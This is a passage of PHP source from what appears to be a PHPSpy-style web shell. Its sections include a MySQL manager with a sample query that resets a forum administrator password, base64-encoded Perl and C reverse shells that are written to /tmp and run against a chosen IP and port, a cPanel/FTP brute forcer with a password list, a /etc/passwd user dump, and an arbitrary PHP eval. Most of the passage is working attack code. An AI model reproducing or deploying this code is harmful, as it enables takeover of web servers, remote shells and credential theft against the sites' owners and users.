724 p('DBUser:');
725 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
726 p('DBPass:');
727 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
728 p('DBName:');
729 makeinput(array('name' => 'dbname', 'size' => 15, 'value' => $dbname));
730 p('DBCharset:');
731 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
732 p('</p>');
733 formfoot();
734 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
735 p('<h2>Upload file</h2>');
736 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
737 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
738 p('<h2>Download file</h2>');
739 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
740 makehide('dbhost');
741 makehide('dbport');
742 makehide('dbuser');
743 makehide('dbpass');
744 makehide('dbname');
745 makehide('charset');
746 makehide('doing');
747 makehide('action', 'sqlfile');
748 p('</form>');
749 } elseif ($action == 'sqladmin') {
750 !$dbhost && $dbhost = 'localhost';
751 !$dbuser && $dbuser = 'root';
752 !$dbport && $dbport = '3306';
753 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
754 if (isset($dbhost)) {
755 $dbform.= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
756 }
757 if (isset($dbuser)) {
758 $dbform.= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
759 }
760 if (isset($dbpass)) {
761 $dbform.= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
762 }
763 if (isset($dbport)) {
764 $dbform.= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
765 }
766 if (isset($dbname)) {
767 $dbform.= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
768 }
769 if (isset($charset)) {
770 $dbform.= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
771 }
772 if ($doing == 'backupmysql' && $saveasfile) {
773 if (!$table) {
774 m('Please choose the table');
775 } else {
776 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
777 $table = array_flip($table);
778 $fp = @fopen($path, 'w');
779 if ($fp) {
780 $result = q('SHOW tables');
781 if (!$result) p('<h2>' . mysql_error() . '</h2>');
782 $mysqldata = '';
783 while ($currow = mysql_fetch_array($result)) {
784 if (isset($table[$currow[0]])) {
785 sqldumptable($currow[0], $fp);
786 }
787 }
788 fclose($fp);
789 $fileurl = str_replace(SA_ROOT, '', $path);
790 m('Database has success backup to <a href="' . $fileurl . '" target="_blank">' . $path . '</a>');
791 mysql_close();
792 } else {
793 m('Backup failed');
794 }
795 }
796 }
797 if ($insert && $insertsql) {
798 $keystr = $valstr = $tmp = '';
799 foreach ($insertsql as $key => $val) {
800 if ($val) {
801 $keystr.= $tmp . $key;
802 $valstr.= $tmp . "'" . addslashes($val) . "'";
803 $tmp = ',';
804 }
805 }
806 if ($keystr && $valstr) {
807 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
808 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
809 }
810 }
811 if ($update && $insertsql && $base64) {
812 $valstr = $tmp = '';
813 foreach ($insertsql as $key => $val) {
814 $valstr.= $tmp . $key . "='" . addslashes($val) . "'";
815 $tmp = ',';
816 }
817 if ($valstr) {
818 $where = base64_decode($base64);
819 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
820 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
821 }
822 }
823 if ($doing == 'del' && $base64) {
824 $where = base64_decode($base64);
825 $delete_sql = "DELETE FROM $tablename WHERE $where";
826 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
827 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
828 }
829 if ($tablename && $doing == 'drop') {
830 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
831 if (q("DROP TABLE $tablename")) {
832 m('Drop table of success');
833 $tablename = '';
834 } else {
835 m(mysql_error());
836 }
837 }
838 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
839 formhead(array('title' => 'MYSQL Manager'));
840 makehide('action', 'sqladmin');
841 p('<p>');
842 p('DBHost:');
843 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
844 p(':');
845 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
846 p('DBUser:');
847 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
848 p('DBPass:');
849 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
850 p('DBCharset:');
851 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
852 makeinput(array('name' => 'connect', 'value' => 'Connect', 'type' => 'submit', 'class' => 'bt'));
853 p('</p>');
854 formfoot();
855 ?>
856 <script type="text/javascript">
857 function editrecord(action, base64, tablename){
858 if (action == 'del') {
859 if (!confirm('Is or isn\'t deletion record?')) return;
860 }
861 $('recordlist').doing.value=action;
862 $('recordlist').base64.value=base64;
863 $('recordlist').tablename.value=tablename;
864 $('recordlist').submit();
865 }
866 function moddbname(dbname) {
867 if(!dbname) return;
868 $('setdbname').dbname.value=dbname;
869 $('setdbname').submit();
870 }
871 function settable(tablename,doing,page) {
872 if(!tablename) return;
873 if (doing) {
874 $('settable').doing.value=doing;
875 }
876 if (page) {
877 $('settable').page.value=page;
878 }
879 $('settable').tablename.value=tablename;
880 $('settable').submit();
881 }
882 </script>
883 <?php
884 // SQL
885 formhead(array('name' => 'recordlist'));
886 makehide('doing');
887 makehide('action', 'sqladmin');
888 makehide('base64');
889 makehide('tablename');
890 p($dbform);
891 formfoot();
892 // Data
893 formhead(array('name' => 'setdbname'));
894 makehide('action', 'sqladmin');
895 p($dbform);
896 if (!$dbname) {
897 makehide('dbname');
898 }
899 formfoot();
900 formhead(array('name' => 'settable'));
901 makehide('action', 'sqladmin');
902 p($dbform);
903 makehide('tablename');
904 makehide('page', $page);
905 makehide('doing');
906 formfoot();
907 $cachetables = array();
908 $pagenum = 30;
909 $page = intval($page);
910 if ($page) {
911 $start_limit = ($page - 1) * $pagenum;
912 } else {
913 $start_limit = 0;
914 $page = 1;
915 }
916 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
917 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
918 // get mysql server
919 $mysqlver = mysql_get_server_info();
920 p('<p>MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '</p>');
921 $highver = $mysqlver > '4.1' ? 1 : 0;
922 // Show database
923 $query = q("SHOW DATABASES");
924 $dbs = array();
925 $dbs[] = '-- Select a database --';
926 while ($db = mysql_fetch_array($query)) {
927 $dbs[$db['Database']] = $db['Database'];
928 }
929 makeselect(array('title' => 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline' => 1));
930 $tabledb = array();
931 if ($dbname) {
932 p('<p>');
933 p('Current dababase: <a href="javascript:moddbname(\'' . $dbname . '\');">' . $dbname . '</a>');
934 if ($tablename) {
935 p(' | Current Table: <a href="javascript:settable(\'' . $tablename . '\');">' . $tablename . '</a> [ <a href="javascript:settable(\'' . $tablename . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $tablename . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $tablename . '\', \'drop\');">Drop</a> ]');
936 }
937 p('</p>');
938 mysql_select_db($dbname);
939 $getnumsql = '';
940 $runquery = 0;
941 if ($sql_query) {
942 $runquery = 1;
943 }
944 $allowedit = 0;
945 if ($tablename && !$sql_query) {
946 $sql_query = "SELECT * FROM $tablename";
947 $getnumsql = $sql_query;
948 $sql_query = $sql_query . " LIMIT $start_limit, $pagenum";
949 $allowedit = 1;
950 }
951 p('<form action="' . $self . '" method="POST">');
952 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>' . $dbname . '</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
953 </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">' . htmlspecialchars($sql_query, ENT_QUOTES) . '</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
954 makehide('tablename', $tablename);
955 makehide('action', 'sqladmin');
956 p($dbform);
957 p('</form>');
958 if ($tablename || ($runquery && $sql_query)) {
959 if ($doing == 'structure') {
960 $result = q("SHOW COLUMNS FROM $tablename");
961 $rowdb = array();
962 while ($row = mysql_fetch_array($result)) {
963 $rowdb[] = $row;
964 }
965 p('<table border="0" cellpadding="3" cellspacing="0">');
966 p('<tr class="head">');
967 p('<td>Field</td>');
968 p('<td>Type</td>');
969 p('<td>Null</td>');
970 p('<td>Key</td>');
971 p('<td>Default</td>');
972 p('<td>Extra</td>');
973 p('</tr>');
974 foreach ($rowdb as $row) {
975 $thisbg = bg();
976 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
977 p('<td>' . $row['Field'] . '</td>');
978 p('<td>' . $row['Type'] . '</td>');
979 p('<td>' . $row['Null'] . ' </td>');
980 p('<td>' . $row['Key'] . ' </td>');
981 p('<td>' . $row['Default'] . ' </td>');
982 p('<td>' . $row['Extra'] . ' </td>');
983 p('</tr>');
984 }
985 tbfoot();
986 } elseif ($doing == 'insert' || $doing == 'edit') {
987 $result = q('SHOW COLUMNS FROM ' . $tablename);
988 while ($row = mysql_fetch_array($result)) {
989 $rowdb[] = $row;
990 }
991 $rs = array();
992 if ($doing == 'insert') {
993 p('<h2>Insert new line in ' . $tablename . ' table »</h2>');
994 } else {
995 p('<h2>Update record in ' . $tablename . ' table »</h2>');
996 $where = base64_decode($base64);
997 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
998 $rs = mysql_fetch_array($result);
999 }
1000 p('<form method="post" action="' . $self . '">');
1001 p($dbform);
1002 makehide('action', 'sqladmin');
1003 makehide('tablename', $tablename);
1004 p('<table border="0" cellpadding="3" cellspacing="0">');
1005 foreach ($rowdb as $row) {
1006 if ($rs[$row['Field']]) {
1007 $value = htmlspecialchars($rs[$row['Field']]);
1008 } else {
1009 $value = '';
1010 }
1011 $thisbg = bg();
1012 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1013 p('<td><b>' . $row['Field'] . '</b><br />' . $row['Type'] . '</td><td><textarea class="area" name="insertsql[' . $row['Field'] . ']" style="width:500px;height:60px;overflow:auto;">' . $value . '</textarea></td></tr>');
1014 }
1015 if ($doing == 'insert') {
1016 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1017 } else {
1018 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1019 makehide('base64', $base64);
1020 }
1021 p('</table></form>');
1022 } else {
1023 $querys = @explode(';', $sql_query);
1024 foreach ($querys as $num => $query) {
1025 if ($query) {
1026 p("<p><b>Query#{$num} : " . htmlspecialchars($query, ENT_QUOTES) . "</b></p>");
1027 switch (qy($query)) {
1028 case 0:
1029 p('<h2>Error : ' . mysql_error() . '</h2>');
1030 break;
1031 case 1:
1032 if (strtolower(substr($query, 0, 13)) == 'select * from') {
1033 $allowedit = 1;
1034 }
1035 if ($getnumsql) {
1036 $tatol = mysql_num_rows(q($getnumsql));
1037 $multipage = multi($tatol, $pagenum, $page, $tablename);
1038 }
1039 if (!$tablename) {
1040 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1041 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1042 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i", $sql_line, $matches);
1043 $tablename = $matches[1][0];
1044 }
1045 $result = q($query);
1046 p($multipage);
1047 p('<table border="0" cellpadding="3" cellspacing="0">');
1048 p('<tr class="head">');
1049 if ($allowedit) p('<td>Action</td>');
1050 $fieldnum = @mysql_num_fields($result);
1051 for ($i = 0;$i < $fieldnum;$i++) {
1052 $name = @mysql_field_name($result, $i);
1053 $type = @mysql_field_type($result, $i);
1054 $len = @mysql_field_len($result, $i);
1055 p("<td nowrap>$name<br><span>$type($len)</span></td>");
1056 }
1057 p('</tr>');
1058 while ($mn = @mysql_fetch_assoc($result)) {
1059 $thisbg = bg();
1060 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1061 $where = $tmp = $b1 = '';
1062 foreach ($mn as $key => $inside) {
1063 if ($inside) {
1064 $where.= $tmp . $key . "='" . addslashes($inside) . "'";
1065 $tmp = ' AND ';
1066 }
1067 $b1.= '<td nowrap>' . html_clean($inside) . ' </td>';
1068 }
1069 $where = base64_encode($where);
1070 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \'' . $where . '\', \'' . $tablename . '\');">Edit</a> | <a href="javascript:editrecord(\'del\', \'' . $where . '\', \'' . $tablename . '\');">Del</a></td>');
1071 p($b1);
1072 p('</tr>');
1073 unset($b1);
1074 }
1075 tbfoot();
1076 p($multipage);
1077 break;
1078 case 2:
1079 $ar = mysql_affected_rows();
1080 p('<h2>affected rows : <b>' . $ar . '</b></h2>');
1081 break;
1082 }
1083 }
1084 }
1085 }
1086 } else {
1087 $query = q("SHOW TABLE STATUS");
1088 $table_num = $table_rows = $data_size = 0;
1089 $tabledb = array();
1090 while ($table = mysql_fetch_array($query)) {
1091 $data_size = $data_size + $table['Data_length'];
1092 $table_rows = $table_rows + $table['Rows'];
1093 $table['Data_length'] = sizecount($table['Data_length']);
1094 $table_num++;
1095 $tabledb[] = $table;
1096 }
1097 $data_size = sizecount($data_size);
1098 unset($table);
1099 p('<table border="0" cellpadding="0" cellspacing="0">');
1100 p('<form action="' . $self . '" method="POST">');
1101 makehide('action', 'sqladmin');
1102 p($dbform);
1103 p('<tr class="head">');
1104 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1105 p('<td>Name</td>');
1106 p('<td>Rows</td>');
1107 p('<td>Data_length</td>');
1108 p('<td>Create_time</td>');
1109 p('<td>Update_time</td>');
1110 if ($highver) {
1111 p('<td>Engine</td>');
1112 p('<td>Collation</td>');
1113 }
1114 p('</tr>');
1115 foreach ($tabledb as $key => $table) {
1116 $thisbg = bg();
1117 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1118 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="' . $table['Name'] . '" /></td>');
1119 p('<td><a href="javascript:settable(\'' . $table['Name'] . '\');">' . $table['Name'] . '</a> [ <a href="javascript:settable(\'' . $table['Name'] . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'drop\');">Drop</a> ]</td>');
1120 p('<td>' . $table['Rows'] . '</td>');
1121 p('<td>' . $table['Data_length'] . '</td>');
1122 p('<td>' . $table['Create_time'] . '</td>');
1123 p('<td>' . $table['Update_time'] . '</td>');
1124 if ($highver) {
1125 p('<td>' . $table['Engine'] . '</td>');
1126 p('<td>' . $table['Collation'] . '</td>');
1127 }
1128 p('</tr>');
1129 }
1130 p('<tr class=fout>');
1131 p('<td> </td>');
1132 p('<td>Total tables: ' . $table_num . '</td>');
1133 p('<td>' . $table_rows . '</td>');
1134 p('<td>' . $data_size . '</td>');
1135 p('<td colspan="' . ($highver ? 4 : 2) . '"> </td>');
1136 p('</tr>');
1137 p("<tr class=\"fout\"><td colspan=\"" . ($highver ? 8 : 6) . "\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"" . SA_ROOT . $_SERVER['HTTP_HOST'] . "_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1138 makehide('doing', 'backupmysql');
1139 formfoot();
1140 p("</table>");
1141 fr($query);
1142 }
1143 }
1144 }
1145 tbfoot();
1146 @mysql_close();
1147 } //end sql backup
1148 elseif ($action == 'backconnect') {
1149 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1150 !$yourport && $yourport = '12345';
1151 $usedb = array('perl' => 'perl', 'c' => 'c');
1152 $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1153 $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1154 if ($start && $yourip && $yourport && $use) {
1155 if ($use == 'perl') {
1156 cf('/tmp/angel_bc', $back_connect);
1157 $res = execute(which('perl') . " /tmp/angel_bc $yourip $yourport &");
1158 } else {
1159 cf('/tmp/angel_bc.c', $back_connect_c);
1160 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1161 @unlink('/tmp/angel_bc.c');
1162 $res = execute("/tmp/angel_bc $yourip $yourport &");
1163 }
1164 m("Now script try connect to $yourip port $yourport ...");
1165 }
1166 formhead(array('title' => 'Back Connect'));
1167 makehide('action', 'backconnect');
1168 p('<p>');
1169 p('Your IP:');
1170 makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
1171 p('Your Port:');
1172 makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
1173 p('Use:');
1174 makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
1175 makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
1176 p('</p>');
1177 formfoot();
1178 } //end backconnect window via NC
1179 // Brute
1180 elseif ($action == 'brute') {
1181 formhead(array('title' => 'Brute Forcer'));
1182 makehide('action', 'brute');
1183 makehide('dir', $brute);
1184 @ini_set('memory_limit', 1000000000000);
1185 $connect_timeout = 5;
1186 @set_time_limit(0);
1187 $submit = $_REQUEST['submit'];
1188 $users = $_REQUEST['users'];
1189 $pass = $_REQUEST['passwords'];
1190 $target = $_REQUEST['target'];
1191 $option = $_REQUEST['option'];
1192 $passlist = "0123456
1193 01234567
1194 012345678
1195 0123456789
1196 01234567890
1197 123456
1198 1234567
1199 12345678
1200 123456789
1201 1234567890
1202 111111
1203 000000
1204 222222
1205 333333
1206 444444
1207 555555
1208 666666
1209 777777
1210 888888
1211 999999
1212 123123
1213 456456
1214 789789
1215 123321
1216 456654
1217 654321
1218 7654321
1219 87654321
1220 987654321
1221 0987654321
1222 admin
1223 administrator
1224 admincp
1225 cpanel
1226 adminx
1227 admins
1228 password
1229 passwords
1230 passw0rd
1231 p@ssw0rd
1232 p@ssword
1233 khongco
1234 25251325
1235 passw0rds";
1236 if ($target == '') {
1237 $target = 'localhost';
1238 }
1239 print " <div align='center'>
1240 <form method='post' style='border: 1px solid #000000'><br><br>
1241 <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1242 <b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1243 <div align='center'><br>
1244 <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1245 <tr>
1246 <td align='center'>
1247 <b>Username</b></td>
1248 <td>
1249 <p align='center'>
1250 <b>Password</b></td>
1251 </tr>
1252 </table>
1253 <p align='center'>
1254 <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1255 $i = 0;
1256 while ($i < 60000) {
1257 $line = posix_getpwuid($i);
1258 if (!empty($line)) {
1259 while (list($key, $vba_etcpwd) = each($line)) {
1260 echo "" . $vba_etcpwd . "\n";
1261 break;
1262 }
1263 }
1264 $i++;
1265 }
1266 echo "
1267 </textarea>
1268 <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1269 <br>
1270 <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1271 <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1272 </td></tr></table></td></tr></form><p align= 'left'>";
1273 ?>
1274 <?php
1275 function ftp_check($host, $user, $pass, $timeout) {
1276 $ch = curl_init();
1277 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1278 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1279 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1280 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1281 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1282 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1283 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1284 $data = curl_exec($ch);
1285 if (curl_errno($ch) == 28) {
1286 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1287 exit;
1288 } elseif (curl_errno($ch) == 0) {
1289 p("<b>[ attack@vbateam.net
1290 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# </b>
1291 <b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1292 }
1293 curl_close($ch);
1294 }
1295 function cpanel_check($host, $user, $pass, $timeout) {
1296 $ch = curl_init();
1297 curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1298 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1299 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1300 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1301 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1302 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1303 $data = curl_exec($ch);
1304 if (curl_errno($ch) == 28) {
1305 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1306 exit;
1307 } elseif (curl_errno($ch) == 0) {
1308 p("<b>[ attack@vbateam.net
1309 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");
1310 }
1311 curl_close($ch);
1312 }
1313 if (isset($submit) && !empty($submit)) {
1314 $userlist = explode("\n", $users);
1315 $passlist = explode("\n", $pass);
1316 p('<b>[ attack@vbateam.net
1317 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# Attacking ...</font></b><br>');
1318 foreach ($userlist as $user) {
1319 $_user = trim($user);
1320 foreach ($passlist as $password) {
1321 $_pass = trim($password);
1322 if ($option == "ftp") {
1323 ftp_check($target, $_user, $_pass, $connect_timeout);
1324 }
1325 if ($option == "cpanel") {
1326 cpanel_check($target, $_user, $_pass, $connect_timeout);
1327 }
1328 }
1329 }
1330 }
1331 formfoot();
1332 } elseif ($action == 'etcpwd') {
1333 formhead(array('title' => 'Get /etc/passwd'));
1334 makehide('action', 'etcpwd');
1335 makehide('dir', $nowpath);
1336 $i = 0;
1337 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1338 while ($i < 60000) {
1339 $line = posix_getpwuid($i);
1340 if (!empty($line)) {
1341 while (list($key, $vba_etcpwd) = each($line)) {
1342 echo "" . $vba_etcpwd . "\n";
1343 break;
1344 }
1345 }
1346 $i++;
1347 }
1348 echo "</textarea></p>";
1349 formfoot();
1350 } elseif ($action == 'eval') {
1351 $phpcode = trim($phpcode);
1352 if ($phpcode) {
1353 if (!preg_match('#<\?#si', $phpcode)) {
1354 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1355 }
1356 eval("?" . ">$phpcode<?");
1357 }
1358 formhead(array('title' => 'Eval PHP Code'));
1359 makehide('action', 'eval');
1360 maketext(array('title' => 'PHP Code', 'name' => 'phpcode', 'value' => $phpcode));
1361 p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
1362 formfooter();
1363 } //end eval
1364 elseif ($action == 'editfile') {
1365 if (file_exists($opfile)) {
1366 $fp = @fopen($opfile, 'r');
1367 $contents = @fread($fp, filesize($opfile));
1368 @fclose($fp);
